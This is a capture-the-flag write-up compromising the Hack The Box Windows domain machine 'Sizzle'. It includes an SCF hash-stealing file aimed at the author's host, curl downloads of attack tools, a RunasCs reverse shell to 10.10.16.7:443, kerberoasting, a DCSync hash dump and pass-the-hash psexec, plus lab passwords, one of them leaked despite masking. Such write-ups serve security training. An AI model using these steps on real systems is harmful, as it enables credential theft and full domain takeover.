HTB - Sizzle
Machine Info
Sizzle is an insane difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for PSRemoting. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.
Enumeration
Scope
IP Address: 10.10.10.103
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5986/tcp open wsmans syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p21,53,80,135,139,443,445,3269,5986 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-27T20:48:39
|_ start_date: 2024-07-26T17:19:10
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required* Open ports: 21,53,80,135,139,443,445,3269,5986
* UDP open ports: 53,88,389
* Services: FTP - DNS - HTTP - HTTTPS - RPC - SMB - winRM - LDAP - KERBEROS
* Important notes: Anonymous FTP login allowed - commonName=sizzle.htb.localUpdate hosts file with domain name, FQDN and computer name
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo '$ip htb.local sizzle.htb.local sizzle' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.10.103 htb.local sizzle.htb.local sizzleDNS Enumeration
Zone transfer failed
dig axfr htb.local @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr htb.local @10.10.10.103
;; global options: +cmd
; Transfer failed.RPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDKERBEROS Enumeration
I can't get any user from bruting kerberos.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ kerbrute userenum --dc $ip -d HTB.LOCAL -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/27 17:01:09 > Done! Tested 48705 usernames (0 valid) in 211.838 secondsLDAP Enumeration
No thing also from ldap
ldapsearch -H ldap://$ip -x -b "DC=htb,DC=local" sub '*' -D username -W password
<snip>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839HTTP & HTTPS Enumeration
subdomain enumeration
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.htb.local" -fs 60
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 ::
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.htb.local" -fs 60 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:59] :: Errors: 0 :: Both links http://htb.local/ & https://htb.local/ lead to the same page
From wappalyzer extension, the webapp runs with ASP.NET technology on IIS web server
Since we are dealing with IIS web server, I will try fuzzing for directories with ISS.fuzz wordlist
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sizzle]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/IIS.fuzz.txt:FUZZ -u http://$ip/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
certenroll/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 226ms]
certsrv/ [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 227ms]
certsrv/mscep_admin [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 194ms]
certsrv/mscep/mscep.dll [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 219ms]
aspnet_client/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 228ms]
images/ [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 195ms]/certsrv requires http authentication
/certenroll gives Access is denied
I can say that the machine has Certificate authority installed on the system.
SMB Enumeration
Anonymous login is enabled along with guest account.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Department Shares Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Operations Disk
SYSVOL Disk Logon server share
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u '' -p '' --shares
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\:
SMB 10.10.10.103 445 SIZZLE [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\guest:
SMB 10.10.10.103 445 SIZZLE [+] Enumerated shares
SMB 10.10.10.103 445 SIZZLE Share Permissions Remark
SMB 10.10.10.103 445 SIZZLE ----- ----------- ------
SMB 10.10.10.103 445 SIZZLE ADMIN$ Remote Admin
SMB 10.10.10.103 445 SIZZLE C$ Default share
SMB 10.10.10.103 445 SIZZLE CertEnroll Active Directory Certificate Services share
SMB 10.10.10.103 445 SIZZLE Department Shares READ
SMB 10.10.10.103 445 SIZZLE IPC$ READ Remote IPC
SMB 10.10.10.103 445 SIZZLE NETLOGON Logon server share
SMB 10.10.10.103 445 SIZZLE Operations
SMB 10.10.10.103 445 SIZZLE SYSVOL Logon server share I will mount Department Shares locally for easy exploring
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo mount -t cifs "\\\\$ip\\Department Shares" ./share
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls
Accounting Banking Devops HR Infosec Legal Marketing Sales Tax ZZ_ARCHIVE
Audit CEO_protected Finance IT Infrastructure 'M&A' 'R&D' Security UsersShell as amanda
ZZ_ARCHIVE has several files & Users has users' folders
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls ZZ_ARCHIVE
AddComplete.pptx LimitInstall.doc 'anony-(externalcell).xlsx' test.doc
AddMerge.ram LimitStep.ppt 'anony-(frameset).docx' test.gif
<snip>
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls Users
Public amanda amanda_adm bill bob chris henry joe jose lkys37en morgan mrb3nI will try to write a file on each directory and see if I have write access to one of them.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ for dir in $(find . -type d 2> /dev/null);do touch $dir/file.txt;done
touch: cannot touch './file.txt': Permission denied
touch: cannot touch './Accounting/file.txt': Permission denied
touch: cannot touch './Audit/file.txt': Permission denied
touch: cannot touch './Banking/file.txt': Permission denied
<snip>
touch: cannot touch './Users/joe/file.txt': Permission denied
touch: cannot touch './Users/jose/file.txt': Permission denied
touch: cannot touch './Users/lkys37en/file.txt': Permission denied
touch: cannot touch './Users/morgan/file.txt': Permission denied
touch: cannot touch './Users/mrb3n/file.txt': Permission deniedI will then search for file.txt and see if It was created successfully in any directory
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ find . -type f -name file.txt 2> /dev/null
./Users/Public/file.txt
./ZZ_ARCHIVE/file.txtSo, I have Write Access to ZZ_ARCHIVE & Public folders , I will try to put .scf or .lnk file to steal NTLMv2 hash if any user enter the shared folder.
The structure of the file looks like this.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─# nano ../@rce.scf
[Shell]
Command=2
IconFile=\\10.10.16.7\share\legit.ico
[Taskbar]
Command=ToggleDesktopPutting the file to the share.
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf ZZ_ARCHIVE
┌──(root㉿kali)-[/home/…/machines/Sizzle/share]
└─$ cp ../@rce.scf Users/PublicI will start Responder to listen for incoming connection
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
<snip>
[+] Listening for events...Get a hash
Starting hashcat to crack the hash
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
<snip>Cracked successfully :)
Verify with cme
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec smb $ip -u amanda -p 'Ashare1972'
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972 Although the credentials are valid, I can't access the machine with winRM
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec winrm $ip -u amanda -p 'Ashare1972'
HTTP 10.10.10.103 5986 SIZZLE [*] https://10.10.10.103:5986/wsman
WINRM 10.10.10.103 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"I will continue to enumerate the machine with this credentials including
Share Access
Bloodhound Collector
/certsrvauthentication
This time I have read access on CertEnroll share
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u amanda -p 'Ashare1972' --shares
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
SMB 10.10.10.103 445 SIZZLE [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.10.103 445 SIZZLE [*] Enumerated shares
SMB 10.10.10.103 445 SIZZLE Share Permissions Remark
SMB 10.10.10.103 445 SIZZLE ----- ----------- ------
SMB 10.10.10.103 445 SIZZLE ADMIN$ Remote Admin
SMB 10.10.10.103 445 SIZZLE C$ Default share
SMB 10.10.10.103 445 SIZZLE CertEnroll READ Active Directory Certificate Services share
SMB 10.10.10.103 445 SIZZLE Department Shares READ
SMB 10.10.10.103 445 SIZZLE IPC$ READ Remote IPC
SMB 10.10.10.103 445 SIZZLE NETLOGON READ Logon server share
SMB 10.10.10.103 445 SIZZLE Operations
SMB 10.10.10.103 445 SIZZLE SYSVOL READ Logon server share When viewing the share content, I find interesting files
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -U amanda "\\\\$ip\CertEnroll"
smb: \> ls
. D 0 Sat Jul 27 13:19:47 2024
.. D 0 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA+.crl A 721 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA.crl A 909 Fri Jul 26 13:19:32 2024
nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018Download them all
smb: \> mget *
Get file HTB-SIZZLE-CA+.crl? y
Get file HTB-SIZZLE-CA.crl? y
Get file nsrev_HTB-SIZZLE-CA.asp? y
Get file sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt? yI will make Enumerate share access done in my notes and switch to collect data with bloodhound.py for further enumeration and go to /certsrv page
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ bloodhound-python -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local -c all --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (sizzle.HTB.LOCAL:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 20S
INFO: Compressing output into 20240727180002_bloodhound.zipI Uploaded the zip file to bloodhound and go to /certsrv
After Authenticated to webapp, It leads me to this page.
I will click on Request a Certificate
Click on advanced certificate request
It asks for Certificate signing request .csr which can be signed with a private key, and I don't have one, So I will generate my private key and sign a .csr file with it.
To login to the machine, I need to have certificate signed from
Certificate Authority (CA)of the domain along with the private key with which the certificate singing request was signed.
Generate the key and csr files.
openssl genrsa -rsa -out amanda.key 2048 # create private key
openssl req -new -key amanda.key -out amanda.csr # create csr┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ cat amanda.csr
-----BEGIN CERTIFICATE REQUEST-----
MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMEl4n1gXzoPDb667AQDphYrnfjXwe3zNwXsniR4
SJSmyEUUrI9iw/j2zDdWVq3+5VL1nV0JK7mgwTc4XdPfI3FmWL6SHCSTCRf0aZ/M
zXf+/dSgTNBPTqWSJN0s8uBRI+FmqnPeaTjo+UMHeqAWxtPzPMkXN90sFbfvqdDw
YtgyxayUrkRffw8T20PZn78LnT6qYX6qMCVle/XxSKKJq/eA+rdIxx3tNoztKbl4
o6pqmvQVpz3Bw6fK+2H/Cgi5QUrdDvV09+33RgdZ9eSlH1u5qTJht+9QMjKPilfs
hEat5JJN40MrtDTg+rU/5iHD/7jE4brwS16ok+l/u8bzeWECAwEAAaAAMA0GCSqG
SIb3DQEBCwUAA4IBAQBQ3yOrhynfPiWtuxZ5BGcL88f9nPYhJ8osR0vtLEmaliGP
cRwIIS37dOH+wOyRvPe//eda6MmLqc91KqlmjCtKO2UquBaeO68DaAL2R46W2a7L
3cUN7Sei8TgWv+dT+kWYma3RsJBZK+R9i1WxMmxGtkyOXgb1IOG9kw5/RUKKLfnQ
jmw2OyU7WQD2Ma57y3Ms7BYzLfQsusuYUOCtmCbIduvpApHn2OFU21ze3+c5w+f1
Y+B0AcEoT6FwjolfIvcoTR9AEnHDJryDht2qzcZqISCTbhoqRQAX079vJnBJ3cwO
94PdJkXsEQujKKxAQyzhG2VAipTBu4Ud2gK22RKg
-----END CERTIFICATE REQUEST-----Paste the csr
Click on Download Certificate!
I will use
evil-winrmwith the following options and enter passphrase when promoted:-Senable SSL-caccept Certificate file-kaccept private key
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ evil-winrm -i 10.10.10.103 -u amanda -p 'Ashare1972' -S -c certnew.cer -k amanda.key
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\amanda\Documents> From impacket toolkit, I use GetUserSPN to find account with Service Prinicpal Names that can be kerberoasted
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ impacket-GetUserSPNs htb.local/amanda:'Ashare1972' -dc-ip 10.10.10.103 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----- ----------------------------------------------------- -------------------------- -------------------------- ----------
http/sizzle mrlky CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL 2018-07-10 14:08:09.536421 2018-07-12 10:23:50.871575When I tried to perform kerberoasting attack from Linux, it failed, So I will attempt it from windows.
When I tried to upload any tool to the box and execute it, it failed, So there might be something preventing me.
We are in Constrained Language modelCLM
*Evil-WinRM* PS C:\Windows\Temp> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguageAlso, after I Queried AppLocker policy, I found that I can run programs in tmp folder
Evil-WinRM* PS C:\Users\amanda> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollection
<snip>
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
<snip>Shell as mrlky
Evil-WinRM* PS C:\Users\amanda> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/Rubeus.exe -o .\R.exePerforming kerberoasting against mrlky user with Rubeus.exe
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ hashcat -m 13100 mrkly.hash /usr/share/wordlists/rockyou.txt
<snip>Cracked :)
I will then upload RunasCs.exe to the machine to get a shell as mrkly
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/RunasCs.exe -o .\RunasCs.exe
*Evil-WinRM* PS C:\Windows\Temp> .\RunasCs.exe mrlky 'Footxxxxxx' PowerShell -r 10.10.16.7:443
Enter PEM pass phrase:
[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2e2163$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2888 created in background.Receive the connection with nc.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 55772
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
htb\mrlkyGet user flag
PS C:\Users\mrlky> type Desktop\user.txt
b31ca0c7a5bcc77a55xxxxxxxxxxxxxxUser Flag: b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
Shell as Administrator
From bloodhound, User Mlky has DCync rights, I can take over the domain by dumping ntds database.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u mrlky -p 'Footbxxxxx' --ntds --user administrator
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB 10.10.10.103 445 SIZZLE Node MRLKY@HTB.LOCAL successfully set as owned in BloodHound
SMB 10.10.10.103 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.103 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.103 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::OR with secretsdump.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-secretsdump htb.local/mrlky@$ip -just-dc-user administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::Access the machine with psexec.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :f6b7160bfc91823792xxxxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file APWgGeJS.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service Kabl on 10.10.10.103.....
[*] Starting service Kabl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Get administrator flag
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\administrator\Desktop> type root.txt
c3d8011c9688feccaxxxxxxxxxxxxxxxRoot Flag: c3d8011c9688feccaxxxxxxxxxxxxxxxx
Last updated